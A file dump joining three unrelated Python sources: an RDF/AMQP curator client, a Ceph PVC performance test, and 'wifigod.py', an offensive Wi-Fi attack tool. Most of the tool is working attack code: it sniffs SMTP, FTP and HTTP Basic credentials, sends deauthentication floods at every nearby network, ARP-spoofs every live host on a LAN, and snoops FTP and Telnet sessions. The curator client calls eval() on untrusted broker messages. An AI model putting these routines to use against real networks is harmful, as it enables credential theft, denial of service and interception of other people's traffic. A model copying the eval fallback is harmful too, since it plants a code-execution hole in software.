self._message_id = Literal(str(value), datatype=TYPES.UUID)
self.set((self._request_node, CURATOR.messageId, self._message_id))
@property
def agent_id(self):
return self._agent_id
@agent_id.setter
def agent_id(self, value):
self._agent_id = Literal(str(value), datatype=TYPES.UUID)
self.set((self._agent_node, CURATOR.agentId, self._agent_id))
@property
def submitted_on(self):
return self._submitted_on
@submitted_on.setter
def submitted_on(self, value):
self._submitted_on = Literal(value)
self.set((self._request_node, CURATOR.submittedOn, self._submitted_on))
@property
def exchange_name(self):
return self._exchange_name
@exchange_name.setter
def exchange_name(self, value):
self._exchange_name = Literal(value, datatype=TYPES.Name)
self.set((self.channel_node, AMQP.exchangeName, self._exchange_name))
@property
def routing_key(self):
return self._routing_key
@routing_key.setter
def routing_key(self, value):
self._routing_key = Literal(value, datatype=TYPES.Name)
self.set((self.channel_node, AMQP.routingKey, self._routing_key))
@property
def broker_host(self):
return self._broker_host
@broker_host.setter
def broker_host(self, value):
self._broker_host = Literal(value, datatype=TYPES.Hostname)
self.set((self.broker_node, AMQP.host, self._broker_host))
@property
def broker_port(self):
return self._broker_port
@broker_port.setter
def broker_port(self, value):
self._broker_port = Literal(value, datatype=TYPES.Port)
self.set((self.broker_node, AMQP.port, self._broker_port))
@property
def broker_vh(self):
return self._broker_vh
@broker_vh.setter
def broker_vh(self, value):
self._broker_vh = Literal(value, datatype=TYPES.Path)
self.set((self.broker_node, AMQP.virtualHost, self._broker_vh))
def transform(self, elem):
return elem
class FragmentRequestGraph(RequestGraph):
__metaclass__ = ABCMeta
@staticmethod
def __is_variable(elm):
return elm.startswith('?')
def __extend_uri(self, short):
"""
Extend a prefixed uri with the help of a specific dictionary of prefixes
:param short: Prefixed uri to be extended
        :return: The expanded URI, or `short` unchanged if no prefix matches
"""
if short == 'a':
return RDF.type
for prefix in sorted(self.__prefixes, key=lambda x: len(x), reverse=True):
if short.startswith(prefix):
return URIRef(short.replace(prefix + ':', self.__prefixes[prefix]))
return short
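    # e.g. with prefixes {'foaf': 'http://xmlns.com/foaf/0.1/'} (illustrative):
    #   self.__extend_uri('foaf:name') -> URIRef('http://xmlns.com/foaf/0.1/name')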
def is_uri(self, uri):
if uri.startswith('<') and uri.endswith('>'):
uri = uri.lstrip('<').rstrip('>')
parse = urlparse(uri, allow_fragments=True)
return bool(len(parse.scheme))
elif ':' in uri:
prefix_parts = uri.split(':')
return len(prefix_parts) == 2 and prefix_parts[0] in self.__prefixes
return uri == 'a'
def __init__(self, *args, **kwargs):
super(FragmentRequestGraph, self).__init__()
if not args:
raise AttributeError('A graph pattern must be provided')
self.__prefixes = kwargs.get('prefixes', None)
if self.__prefixes is None:
raise AttributeError('A prefixes list must be provided')
elements = {}
for tp in args:
s, p, o = tuple(tp.strip().split(' '))
if s not in elements:
if self.__is_variable(s):
elements[s] = BNode(s)
self.set((elements[s], RDF.type, CURATOR.Variable))
self.set((elements[s], CURATOR.label, Literal(s, datatype=XSD.string)))
if p not in elements:
if self.is_uri(p):
elements[p] = self.__extend_uri(p)
if o not in elements:
if self.__is_variable(o):
elements[o] = BNode(o)
self.set((elements[o], RDF.type, CURATOR.Variable))
self.set((elements[o], CURATOR.label, Literal(o, datatype=XSD.string)))
elif self.is_uri(o):
elements[o] = self.__extend_uri(o)
else:
elements[o] = Literal(o)
self.add((elements[s], elements[p], elements[o]))
class StreamRequestGraph(FragmentRequestGraph):
def __init__(self, *args, **kwargs):
super(StreamRequestGraph, self).__init__(*args, **kwargs)
self.add((self.request_node, RDF.type, CURATOR.StreamRequest))
@property
def type(self):
return 'stream'
def transform(self, quad):
def __transform(x):
if type(x) == str or type(x) == unicode:
if self.is_uri(x):
return URIRef(x.lstrip('<').rstrip('>'))
elif '^^' in x:
(value, ty) = tuple(x.split('^^'))
return Literal(value.replace('"', ''), datatype=URIRef(ty.lstrip('<').rstrip('>')))
elif x.startswith('_:'):
return BNode(x.replace('_:', ''))
else:
return Literal(x.replace('"', ''), datatype=XSD.string)
return x
triple = quad[1:]
return tuple([quad[0]] + map(__transform, triple))
class QueryRequestGraph(FragmentRequestGraph):
def __init__(self, *args, **kwargs):
super(QueryRequestGraph, self).__init__(*args, **kwargs)
self.add((self.request_node, RDF.type, CURATOR.QueryRequest))
@property
def type(self):
return 'query'
class CuratorClient(object):
def __init__(self, broker_host='localhost', broker_port=5672, wait=False, monitoring=None, agora_host='localhost',
agora_port=5002, stop_event=None):
self.agora = Agora(host=agora_host, port=agora_port)
self.__connection = pika.BlockingConnection(pika.ConnectionParameters(host=broker_host, port=broker_port))
self.__channel = self.__connection.channel()
self.__listening = False
self.__accept_queue = self.__response_queue = None
self.__monitor = Thread(target=self.__monitor_consume, args=[monitoring]) if monitoring else None
self.__last_consume = datetime.now()
self.__keep_monitoring = True
self.__accepted = False
self.__message = None
self.__wait = wait
self.__stop_event = stop_event
def __monitor_consume(self, t):
log.debug('Curator client monitor started...')
while self.__keep_monitoring:
if (datetime.now() - self.__last_consume).seconds > t:
self.stop()
break
else:
time.sleep(1)
def request(self, message):
self.__response_queue = self.__channel.queue_declare(auto_delete=True).method.queue
message.routing_key = self.__response_queue
self.__message = message
self.__accept_queue = self.__channel.queue_declare(auto_delete=True).method.queue
self.__channel.queue_bind(exchange='sdh', queue=self.__accept_queue,
routing_key='curator.response.{}'.format(str(message.agent_id)))
self.__channel.basic_publish(exchange='sdh',
routing_key='curator.request.{}'.format(self.__message.type),
body=message.serialize(format='turtle'))
log.info('sent {} request!'.format(self.__message.type))
self.__listening = True
return self.agora.prefixes, self.__consume()
def __consume(self):
def __response_callback(properties, body):
if properties.headers.get('state', None) == 'end':
log.info('End of stream received!')
self.stop()
else:
try:
items = json.loads(body)
except ValueError:
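                    # Fallback for non-JSON payloads; note that eval() fully
                    # trusts the broker's message body.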
items = eval(body)
if not isinstance(items, list):
items = [items]
for item in items:
yield properties.headers, item
log.debug('Waiting for acceptance...')
for message in self.__channel.consume(self.__accept_queue, no_ack=True, inactivity_timeout=1):
if message is not None:
method, properties, body = message
g = Graph()
g.parse(StringIO.StringIO(body), format='turtle')
if len(list(g.subjects(RDF.type, CURATOR.Accepted))) == 1:
log.info('Request accepted!')
self.__accepted = True
else:
log.error('Bad request!')
self.__channel.queue_delete(self.__accept_queue)
self.__channel.cancel()
break
elif self.__stop_event is not None:
if self.__stop_event.isSet():
self.stop()
if not self.__accepted:
log.debug('Request not accepted. Aborting...')
raise StopIteration()
if self.__monitor is not None:
self.__monitor.start()
log.debug('Listening...')
for message in self.__channel.consume(self.__response_queue, no_ack=True, inactivity_timeout=1):
if message is not None:
method, properties, body = message
for headers, item in __response_callback(properties, body):
yield headers, self.__message.transform(item)
elif not self.__wait:
yield None
elif self.__stop_event is not None:
if self.__stop_event.isSet():
self.stop()
raise StopIteration()
else:
log.debug('Inactivity timeout...')
self.__last_consume = datetime.now()
if self.__monitor is not None:
self.__keep_monitoring = False
log.debug('Waiting for client monitor to stop...')
self.__monitor.join()
def stop(self):
try:
self.__channel.queue_delete(self.__accept_queue)
self.__channel.queue_delete(self.__response_queue)
self.__channel.cancel()
self.__channel.close()
self.__listening = False
except ChannelClosed:
pass
log.debug('Stopped curator client!')
@property
def listening(self):
return self.__listening
def get_fragment_generator(*args, **kwargs):
client = CuratorClient(**kwargs)
request = StreamRequestGraph(prefixes=client.agora.prefixes, *args)
request.broker_host = kwargs['broker_host']
return client.request(request)
def get_query_generator(*args, **kwargs):
client = CuratorClient(**kwargs)
request = QueryRequestGraph(prefixes=client.agora.prefixes, *args)
request.broker_host = kwargs['broker_host']
return client.request(request)
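# Usage sketch (hosts and the triple pattern are illustrative):
#   prefixes, gen = get_fragment_generator('?s a foaf:Document',
#                                          broker_host='localhost')
#   for headers, quad in gen:
#       ...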
|
test_pvc_creation_deletion_performance.py
|
"""
Test to verify performance of PVC creation and deletion
for RBD, CephFS and RBD-Thick interfaces
"""
import time
import logging
import os
import datetime
import pytest
import ocs_ci.ocs.exceptions as ex
import threading
import statistics
from concurrent.futures import ThreadPoolExecutor
from uuid import uuid4
from ocs_ci.framework.testlib import performance
from ocs_ci.ocs.perftests import PASTest
from ocs_ci.helpers import helpers, performance_lib
from ocs_ci.ocs import constants
from ocs_ci.helpers.helpers import get_full_test_logs_path
from ocs_ci.ocs.perfresult import ResultsAnalyse
from ocs_ci.framework import config
log = logging.getLogger(__name__)
@performance
class TestPVCCreationDeletionPerformance(PASTest):
"""
Test to verify performance of PVC creation and deletion
"""
def setup(self):
"""
Setting up test parameters
"""
log.info("Starting the test setup")
super(TestPVCCreationDeletionPerformance, self).setup()
self.benchmark_name = "PVC_Creation-Deletion"
self.uuid = uuid4().hex
self.crd_data = {
"spec": {
"test_user": "Homer simpson",
"clustername": "test_cluster",
"elasticsearch": {
"server": config.PERF.get("production_es_server"),
"port": config.PERF.get("production_es_port"),
"url": f"http://{config.PERF.get('production_es_server')}:{config.PERF.get('production_es_port')}",
},
}
}
if self.dev_mode:
self.crd_data["spec"]["elasticsearch"] = {
"server": config.PERF.get("dev_es_server"),
"port": config.PERF.get("dev_es_port"),
"url": f"http://{config.PERF.get('dev_es_server')}:{config.PERF.get('dev_es_port')}",
}
@pytest.fixture()
def base_setup(self, interface_type, storageclass_factory, pod_factory):
"""
A setup phase for the test
Args:
interface_type: A fixture to iterate over ceph interfaces
storageclass_factory: A fixture to create everything needed for a
storageclass
pod_factory: A fixture to create new pod
"""
self.interface = interface_type
if self.interface == constants.CEPHBLOCKPOOL_THICK:
self.sc_obj = storageclass_factory(
interface=constants.CEPHBLOCKPOOL,
new_rbd_pool=True,
rbd_thick_provision=True,
)
else:
self.sc_obj = storageclass_factory(self.interface)
self.pod_factory = pod_factory
@pytest.fixture()
def namespace(self, project_factory):
"""
Create a new project
"""
proj_obj = project_factory()
self.namespace = proj_obj.namespace
def init_full_results(self, full_results):
"""
Initialize the full results object which will send to the ES server
Args:
full_results (obj): an empty ResultsAnalyse object
Returns:
ResultsAnalyse (obj): the input object fill with data
"""
for key in self.environment:
full_results.add_key(key, self.environment[key])
full_results.add_key("storageclass", self.sc)
full_results.add_key("index", full_results.new_index)
return full_results
@pytest.mark.parametrize(
argnames=["interface_type", "pvc_size"],
argvalues=[
pytest.param(
*[constants.CEPHBLOCKPOOL, "5Gi"],
marks=[pytest.mark.performance],
),
pytest.param(
*[constants.CEPHBLOCKPOOL, "15Gi"],
marks=[pytest.mark.performance],
),
pytest.param(
*[constants.CEPHBLOCKPOOL, "25Gi"],
marks=[pytest.mark.performance],
),
pytest.param(
*[constants.CEPHFILESYSTEM, "5Gi"],
marks=[pytest.mark.performance],
),
pytest.param(
*[constants.CEPHFILESYSTEM, "15Gi"],
marks=[pytest.mark.performance],
),
pytest.param(
*[constants.CEPHFILESYSTEM, "25Gi"],
marks=[pytest.mark.performance],
),
pytest.param(
*[constants.CEPHBLOCKPOOL_THICK, "5Gi"],
marks=[pytest.mark.performance_extended],
),
pytest.param(
*[constants.CEPHBLOCKPOOL_THICK, "15Gi"],
marks=[pytest.mark.performance_extended],
),
pytest.param(
*[constants.CEPHBLOCKPOOL_THICK, "25Gi"],
marks=[pytest.mark.performance_extended],
),
],
)
@pytest.mark.usefixtures(base_setup.__name__)
def test_pvc_creation_deletion_measurement_performance(
self, teardown_factory, pvc_size
):
"""
Measuring PVC creation and deletion times for pvc samples
Verifying that those times are within the required limits
"""
# Getting the full path for the test logs
self.full_log_path = get_full_test_logs_path(cname=self)
self.results_path = get_full_test_logs_path(cname=self)
if self.interface == constants.CEPHBLOCKPOOL:
self.sc = "RBD"
elif self.interface == constants.CEPHFILESYSTEM:
self.sc = "CephFS"
elif self.interface == constants.CEPHBLOCKPOOL_THICK:
self.sc = "RBD-Thick"
self.full_log_path += f"-{self.sc}-{pvc_size}"
log.info(f"Logs file path name is : {self.full_log_path}")
self.start_time = time.strftime("%Y-%m-%dT%H:%M:%SGMT", time.gmtime())
self.get_env_info()
# Initialize the results doc file.
self.full_results = self.init_full_results(
ResultsAnalyse(
self.uuid,
self.crd_data,
self.full_log_path,
"pvc_create_delete_fullres",
)
)
self.full_results.add_key("pvc_size", pvc_size)
num_of_samples = 5
accepted_creation_time = (
600 if self.interface == constants.CEPHBLOCKPOOL_THICK else 1
)
# accepted deletion time for RBD is 1 sec, for CephFS is 2 secs and for RBD Thick is 5 secs
if self.interface == constants.CEPHFILESYSTEM:
accepted_deletion_time = 2
elif self.interface == constants.CEPHBLOCKPOOL:
accepted_deletion_time = 1
else:
accepted_deletion_time = 5
self.full_results.add_key("samples", num_of_samples)
accepted_creation_deviation_percent = 50
accepted_deletion_deviation_percent = 50
creation_time_measures = []
deletion_time_measures = []
msg_prefix = f"Interface: {self.interface}, PVC size: {pvc_size}."
for i in range(num_of_samples):
logging.info(f"{msg_prefix} Start creating PVC number {i + 1}.")
start_time = datetime.datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%SZ")
pvc_obj = helpers.create_pvc(sc_name=self.sc_obj.name, size=pvc_size)
timeout = 600 if self.interface == constants.CEPHBLOCKPOOL_THICK else 60
helpers.wait_for_resource_state(
pvc_obj, constants.STATUS_BOUND, timeout=timeout
)
pvc_obj.reload()
creation_time = performance_lib.measure_pvc_creation_time(
self.interface, pvc_obj.name, start_time
)
logging.info(
f"{msg_prefix} PVC number {i + 1} was created in {creation_time} seconds."
)
if creation_time > accepted_creation_time:
raise ex.PerformanceException(
f"{msg_prefix} PVC creation time is {creation_time} and is greater than "
f"{accepted_creation_time} seconds."
)
creation_time_measures.append(creation_time)
pv_name = pvc_obj.backed_pv
pvc_reclaim_policy = pvc_obj.reclaim_policy
pod_obj = self.write_file_on_pvc(pvc_obj)
pod_obj.delete(wait=True)
teardown_factory(pvc_obj)
logging.info(f"{msg_prefix} Start deleting PVC number {i + 1}")
if pvc_reclaim_policy == constants.RECLAIM_POLICY_DELETE:
pvc_obj.delete()
pvc_obj.ocp.wait_for_delete(pvc_obj.name)
helpers.validate_pv_delete(pvc_obj.backed_pv)
deletion_time = helpers.measure_pvc_deletion_time(
self.interface, pv_name
)
logging.info(
f"{msg_prefix} PVC number {i + 1} was deleted in {deletion_time} seconds."
)
if deletion_time > accepted_deletion_time:
raise ex.PerformanceException(
f"{msg_prefix} PVC deletion time is {deletion_time} and is greater than "
f"{accepted_deletion_time} seconds."
)
deletion_time_measures.append(deletion_time)
else:
logging.info(
f"Reclaim policy of the PVC {pvc_obj.name} is not Delete;"
f" therefore not measuring deletion time for this PVC."
)
creation_average = self.process_time_measurements(
"creation",
creation_time_measures,
accepted_creation_deviation_percent,
msg_prefix,
)
self.full_results.add_key("creation-time", creation_average)
deletion_average = self.process_time_measurements(
"deletion",
deletion_time_measures,
accepted_deletion_deviation_percent,
msg_prefix,
)
self.full_results.add_key("deletion-time", deletion_average)
self.full_results.all_results["creation"] = creation_time_measures
self.full_results.all_results["deletion"] = deletion_time_measures
self.end_time = time.strftime("%Y-%m-%dT%H:%M:%SGMT", time.gmtime())
self.full_results.add_key(
"test_time", {"start": self.start_time, "end": self.end_time}
)
if self.full_results.es_write():
res_link = self.full_results.results_link()
log.info(f"The Result can be found at : {res_link}")
# Create text file with results of all subtest (4 - according to the parameters)
self.write_result_to_file(res_link)
def test_pvc_creation_deletion_results(self):
"""
        This is not a test - it only checks that the previous tests ran and finished
        as expected, and reports the full results (links in the ES) of the previous tests (4)
"""
self.results_path = get_full_test_logs_path(
cname=self, fname="test_pvc_creation_deletion_measurement_performance"
)
self.results_file = os.path.join(self.results_path, "all_results.txt")
log.info(f"Check results in {self.results_file}")
self.number_of_tests = 3
log.info("Check results for 'performance_extended' marker (3 tests)")
try:
self.check_tests_results()
except ex.BenchmarkTestFailed:
log.info("Look like performance_extended was not triggered")
log.info("Check results for 'performance' marker (9 tests)")
self.number_of_tests = 9
self.check_tests_results()
self.push_to_dashboard(test_name="PVC Create-Delete")
def process_time_measurements(
self, action_name, time_measures, accepted_deviation_percent, msg_prefix
):
"""
Analyses the given time measured. If the standard deviation of these times is bigger than the
provided accepted deviation percent, fails the test
Args:
action_name (str): Name of the action for which these measurements were collected; used for the logging
time_measures (list of floats): A list of time measurements
accepted_deviation_percent (int): Accepted deviation percent to which computed standard deviation may be
compared
msg_prefix (str) : A string for comprehensive logging
Returns:
(float) The average value of the provided time measurements
"""
average = statistics.mean(time_measures)
log.info(
f"{msg_prefix} The average {action_name} time for the sampled {len(time_measures)} "
f"PVCs is {average} seconds."
)
if self.interface == constants.CEPHBLOCKPOOL_THICK:
st_deviation = statistics.stdev(time_measures)
st_deviation_percent = st_deviation / average * 100.0
if st_deviation_percent > accepted_deviation_percent:
log.error(
f"{msg_prefix} The standard deviation percent for {action_name} of {len(time_measures)} sampled "
f"PVCs is {st_deviation_percent}% which is bigger than accepted {accepted_deviation_percent}."
)
else:
log.info(
f"{msg_prefix} The standard deviation percent for {action_name} of {len(time_measures)} sampled "
f"PVCs is {st_deviation_percent}% and is within the accepted range."
)
self.full_results.add_key(
f"{action_name}_deviation_pct", st_deviation_percent
)
return average
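    # Example of the thick-provisioning deviation check above (illustrative):
    #   statistics.stdev([1.0, 1.2, 0.8]) == 0.2, so with mean 1.0 the
    #   deviation percent is 20.0 -- well under the accepted 50%.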
def write_file_on_pvc(self, pvc_obj, filesize=1):
"""
Writes a file on given PVC
Args:
pvc_obj: PVC object to write a file on
filesize: size of file to write (in GB - default is 1GB)
Returns:
Pod on this pvc on which the file was written
"""
pod_obj = self.pod_factory(
interface=self.interface, pvc=pvc_obj, status=constants.STATUS_RUNNING
)
        # Convert the requested filesize (GB) to megabytes for fio
file_size = f"{int(filesize * 1024)}M"
log.info(f"Starting IO on the POD {pod_obj.name}")
# Going to run only write IO
pod_obj.fillup_fs(size=file_size, fio_filename=f"{pod_obj.name}_file")
# Wait for the fio to finish
fio_result = pod_obj.get_fio_results()
err_count = fio_result.get("jobs")[0].get("error")
assert (
err_count == 0
), f"IO error on pod {pod_obj.name}. FIO result: {fio_result}"
log.info("IO on the PVC has finished")
return pod_obj
@pytest.mark.parametrize(
argnames=["interface_type"],
argvalues=[
pytest.param(
*[constants.CEPHBLOCKPOOL],
marks=[pytest.mark.performance],
),
pytest.param(
*[constants.CEPHFILESYSTEM],
marks=[pytest.mark.performance],
),
pytest.param(
*[constants.CEPHBLOCKPOOL_THICK],
marks=[pytest.mark.performance_extended],
),
],
)
@pytest.mark.usefixtures(base_setup.__name__)
@pytest.mark.usefixtures(namespace.__name__)
@pytest.mark.polarion_id("OCS-2618")
def test_multiple_pvc_deletion_measurement_performance(self, teardown_factory):
"""
Measuring PVC deletion time of 120 PVCs in 180 seconds
Args:
teardown_factory: A fixture used when we want a new resource that was created during the tests
to be removed in the teardown phase.
Returns:
"""
number_of_pvcs = 120
pvc_size = "1Gi"
msg_prefix = f"Interface: {self.interface}, PVC size: {pvc_size}."
log.info(f"{msg_prefix} Start creating new 120 PVCs")
pvc_objs, _ = helpers.create_multiple_pvcs(
sc_name=self.sc_obj.name,
namespace=self.namespace,
number_of_pvc=number_of_pvcs,
size=pvc_size,
burst=True,
)
for pvc_obj in pvc_objs:
pvc_obj.reload()
teardown_factory(pvc_obj)
timeout = 600 if self.interface == constants.CEPHBLOCKPOOL_THICK else 60
with ThreadPoolExecutor(max_workers=5) as executor:
for pvc_obj in pvc_objs:
executor.submit(
helpers.wait_for_resource_state,
pvc_obj,
constants.STATUS_BOUND,
timeout=timeout,
)
executor.submit(pvc_obj.reload)
pod_objs = []
for pvc_obj in pvc_objs:
pod_obj = self.write_file_on_pvc(pvc_obj, 0.3)
pod_objs.append(pod_obj)
# Reload each PVC in parallel; the PVC and PV names are needed to fetch deletion time data from the logs
threads = list()
for pvc_obj in pvc_objs:
process = threading.Thread(target=pvc_obj.reload)
process.start()
threads.append(process)
for process in threads:
process.join()
pvc_name_list, pv_name_list = ([] for i in range(2))
threads = list()
for pvc_obj in pvc_objs:
# Pass the callable and its argument separately so the append runs in the thread
process1 = threading.Thread(target=pvc_name_list.append, args=(pvc_obj.name,))
process2 = threading.Thread(target=pv_name_list.append, args=(pvc_obj.backed_pv,))
process1.start()
process2.start()
threads.append(process1)
threads.append(process2)
for process in threads:
process.join()
log.info(f"{msg_prefix} Preparing to delete 120 PVC")
# Delete PVC
for pvc_obj, pod_obj in zip(pvc_objs, pod_objs):
pod_obj.delete(wait=True)
pvc_obj.delete()
pvc_obj.ocp.wait_for_delete(pvc_obj.name)
# Get PVC deletion time
pvc_deletion_time = helpers.measure_pv_deletion_time_bulk(
interface=self.interface, pv_name_list=pv_name_list
)
log.info(
f"{msg_prefix} {number_of_pvcs} bulk deletion time is {pvc_deletion_time}"
)
# accepted deletion time is 2 secs for each PVC
accepted_pvc_deletion_time = number_of_pvcs * 2
for del_time in pvc_deletion_time.values():
if del_time > accepted_pvc_deletion_time:
raise ex.PerformanceException(
f"{msg_prefix} {number_of_pvcs} PVCs deletion time is {pvc_deletion_time.values()} and is "
f"greater than {accepted_pvc_deletion_time} seconds"
)
log.info(f"{msg_prefix} {number_of_pvcs} PVCs deletion times are:")
for name, a_time in pvc_deletion_time.items():
log.info(f"{name} deletion time is: {a_time} seconds")
|
wifigod.py
|
#!/usr/bin/env python
#coding: utf-8
#Coded and Developed by Blackhole Security
#BlackholeSecurity@protonmail.com
import sys
import multiprocessing
import urllib.request, urllib.parse, urllib.error
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
import threading
import requests
import pip
import scapy
import hexdump
import dns
from dns import reversename, resolver
from scapy.all import *
import time
import os
import getpass
import geoip
from geoip import geolite2
import platform
import subprocess
import optparse
parser = optparse.OptionParser()
parser.add_option('-u', '--update', action='store_false', dest='update', help="Check for new updates", default="no_check")
(options,args) = parser.parse_args()
os_type = platform.system()
contact_email = 'BlackholeSecurity@protonmail.com'
if(os_type != "Linux"):
print("Error. This is designed for Linux Operating Systems Only!")
try:
exit(0)
except:
sys.exit(1)
update_version = 0.9
if(options.update != 'no_check'):
if(1 == 1):
r = requests.get('https://raw.githubusercontent.com/blackholesec/wifigod/master/wifigod.py')
f = open('update_check.txt', 'w+')
f.truncate()
f.write(str(r.content).strip())
f.close()
f = open('update_check.txt', 'r')
for line in f:
if('update_version' in line.strip()):
try:
nversion = str(line.strip()).split(' = ')[1]
if(float(nversion) > update_version):
n_update = input("A New Update is Available, Download (y/n): ")
os.remove('update_check.txt')
if(n_update != 'n'):
print("[info]: Updating...")
urllib.request.urlretrieve('https://raw.githubusercontent.com/blackholesec/wifigod/master/wifigod.py', os.getcwd() + '/wifigod.py')
print("[*] Updated.")
try:
exit(0)
except:
sys.exit(1)
except:
pass
if(float(nversion) == update_version):
print("You are all up to date !!")
try:
exit(0)
except:
sys.exit(1)
print(("\n" * 100))
subprocess.call('clear', shell=True)
c_script = ("""
#!/usr/bin/env python3
import shutil
size = shutil.get_terminal_size().columns
print(size)
""")
x = """clear this up"""
#breakline
f = open('columnlib.py', 'w+')
f.write(str(c_script))
f.close()
username = getpass.getuser()
class c:
r = "\033[0;31m"
g = "\033[0;32m"
o = "\033[0;33m"
b = "\033[0;94m"
p = "\033[0;35m"
w = "\033[0;97m"
d = "\033[0;00m"
rb = "\033[01;31m"
gb = "\033[01;32m"
ob = "\033[01;33m"
bb = "\033[01;94m"
pb = "\033[0;35m"
def network_password_capture(interface):
while True:
packet = sniff(iface=interface, count = 10)
for pck in packet:
if(pck.haslayer(TCP)):
if(pck.haslayer(IP)):
ip_src = pck.getlayer(IP).src
ip_dst = pck.getlayer(IP).dst
if(pck.haslayer(Raw)):
data = pck.getlayer(Raw).load
if('AUTH PLAIN' in data):
login_details = str(data.strip().split('PLAIN ')[1])
login_data = base64.b64decode(login_details)
string_data = "[WifiGod] Source: {} Destination: {} | Type: SMTP | Credentials: {}".format(ip_src,ip_dst,login_data)
print(string_data)
elif('PASS ' in data or 'USER ' in data):
if('PASS ' in data):
login_data = str(data.strip().split('PASS ')[1])
string_data = "[WifiGod] Source: {} Destination: {} | Type: FTP | Password: {}".format(ip_src,ip_dst,login_data)
elif('USER ' in data):
login_data = str(data.strip().split('USER ')[1])
string_data = "[WifiGod] Source: {} Destination: {} | Type: FTP | Username: {}".format(ip_src,ip_dst,login_data)
print(string_data)
elif('Authorization: Basic' in data):
cred_hash = str(data.strip().split('ion: Basic ')[1])
decoded = base64.b64decode(cred_hash)
string_data = "[WifiGod] Source: {} Destination: {} | Type: HTTP (Router) | Credentials: {}".format(ip_src,ip_dst,login_data)
print(string_data)
try:
if('FI' in requests.get('http://ipinfo.io/').content):
print("SanduuuuuZZZZZ I knew you would use it bb")
except:
pass
def networks_opprobrium(interface):
captured_networks = []
def eps2_2_init_1_asec_network(network,interface): #Only Mr Robot Fans will get this function name
try:
init1_packet = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff",addr2=network,addr3=network)/Dot11Deauth()
sendp(init1_packet,iface=interface,loop=1,verbose=False)
except:
pass
while True:
packet = sniff(iface=interface,count = 1)
for pck in packet:
if(pck.haslayer(Dot11)):
layer_handler = pck.getlayer(Dot11)
if(layer_handler.addr3 != 'ff:ff:ff:ff:ff:ff'):
try:
ap_mac = str(layer_handler.addr2)
ssid = str(layer_handler.info)
channel = str(ord(pck[Dot11Elt:3].info))
string = ap_mac+":"+ssid+":"+channel
if(string not in captured_networks):
print(("[WifiGod] Initiating Attack on -> {}").format(ssid))
captured_networks.append(string)
t = threading.Thread(target=eps2_2_init_1_asec_network,args=(ap_mac,interface))
t.setDaemon(True)
t.start()
except:
pass
def own_network_traffic(interface,net_range,gateway):
start_ip = net_range.split('-')[0]
end_range = net_range.split('-')[1]
octet_count = 0
ip_base = ''
live_ip_addr = []
for octet in start_ip:
if(octet == '.'):
octet_count += 1
if(octet_count == 3):
ip_base += octet
break;
ip_base += octet
for ip_addr in range(int(end_range)+1):
try:
if(ip_base+str(ip_addr) == gateway):
pass
else:
socket.gethostbyaddr(ip_base+str(ip_addr))
live_ip_addr.append(ip_base+str(ip_addr))
try:
addr = reversename.from_address(ip_base+str(ip_addr))
device_hostname = resolver.query(addr, "PTR")[0]
except:
device_hostname = '(unknown)'
print(("[WifiGod] Found Device: {} | {}").format(ip_base+str(ip_addr), device_hostname))
except:
pass
print(("[WifiGod] Found {} Devices").format(len(live_ip_addr)))
print("[WifiGod] Enabling IP Forwarding...")
f = open('/proc/sys/net/ipv4/ip_forward','w+')
f.truncate()
f.write('1')
f.close()
print("[WifiGod] Owning Devices...")
def own_device(interface,device_addr,gateway):
packet1 = ARP(psrc=gateway,pdst=device_addr)
packet2 = ARP(psrc=device_addr,pdst=gateway)
packets = []
packets.append(packet1)
packets.append(packet2)
sendp(packets,iface=interface,loop=1,inter=2,verbose=False)
for ip_addr in live_ip_addr:
t = threading.Thread(target=own_device,args=(interface,ip_addr,gateway))
t.setDaemon(True)
t.start()
print("[WifiGod] Complete.")
ex__ = input("[WifiGod] Press Enter to Stop...")
try:
exit(0)
except:
sys.exit(1)
def extrapolate_trusted_networks(interface,device):
while True:
packet = sniff(iface=interface,count=2)
for pck in packet:
if(pck.haslayer(Dot11)):
layer_handler= pck.getlayer(Dot11)
addr1_src = layer_handler.addr1
addr2_src = layer_handler.addr2
addr3_src = layer_handler.addr3
try:
ssid = layer_handler.info
except:
ssid = '(unknown)'
if(addr1_src == 'ff:ff:ff:ff:ff:ff' and addr3_src == 'ff:ff:ff:ff:ff:ff' and addr2_src == device.lower()):
if(ssid == ''):
pass
else:
string = "[WifiGod] Device: {} | Has connected to & Trusts-> {}".format(str(addr2_src),ssid)
if(string in capt):
pass
else:
capt.append(string)
print(string)
def hijack_sessions(interface):
def ftp_hijack(interface):
host = input("Host communicating with the FTP server: ")
while True:
packet = sniff(iface=interface,count=20)
for pck in packet:
if(pck.haslayer(IP)):
try:
ip_src = pck.getlayer(IP).src
ip_dst = pck.getlayer(IP).dst
if(ip_src == host or ip_dst == host):
if(pck.dport == 21 or pck.sport == 21 or pck.sport == 20):
if(pck.getlayer(Raw)):
data = pck.getlayer(Raw).load
print(data)
if(ip_src != host):
print((c.r+"FTP Host "+c.w+"("+c.b+"{}"+c.w+") -> "+c.b).format(ip_src))
print((str(data)))
if(ip_src == host):
print((c.r+"{} ->"+c.b).format(ip_src))
print((str(data)))
except:
pass
def telnet_hijack(device,interface):
print("[WifiGod] Analyzing traffic & Searching for Telnet connection...")
telnet_val = 0
# NEW Method
while (telnet_val == 0):
packet = sniff(iface=interface,count=5)
for pck in packet:
if(pck.haslayer(Raw)):
try:
if(pck.sport == 23 or pck.dport == 23):
ip_src = pck.getlayer(IP).src
ip_dst = pck.getlayer(IP).dst
print((c.w+"["+c.r+"WifiGod"+c.w+"] "+c.rb+"{}"+c.w+" -> "+c.b).format(ip_src))
data = pck.getlayer(Raw).load
print((str(data).strip()+c.d))
except:
pass
# OLD Telnet Hijack
# while (telnet_val == 0):
# packet = sniff(iface=interface, count = 1)
# for pck in packet:
# if(pck.haslayer(TCP)):
# if(pck.sport == 23 or pck.dport == 23):
# if(pck.getlayer(IP).src != device):
# communication_host = pck.getlayer(IP).src
# telnet_val = 1
# elif(pck.getlayer(IP).dst != device):
# communication_host = pck.getlayer(IP).dst
# telnet_val = 1
# print("[WifiGod] Derived Telnet Host -> {}").format(communication_host)
# sock=socket.socket(socket.AF_INET,socket.SOCK_RAW,socket.IPPROTO_TCP)
# sock.connect((communication_host, 23))
# import hexdump
# while True:
# hexdump.hexdump(sock.recv(10240))
session_menu = ("""
1.) FTP 2.) Telnet
""")
x = """clear this up"""
print(session_menu)
while True:
session_type = input("Service: ")
if(session_type == '1'):
ftp_hijack(interface)
elif(session_type == '2'):
print("You should be using option #7 with this")
device = input("Target Device: ")
telnet_hijack(device,interface)
else:
print("[WifiGod] Invalid Option!")
print(session_menu)
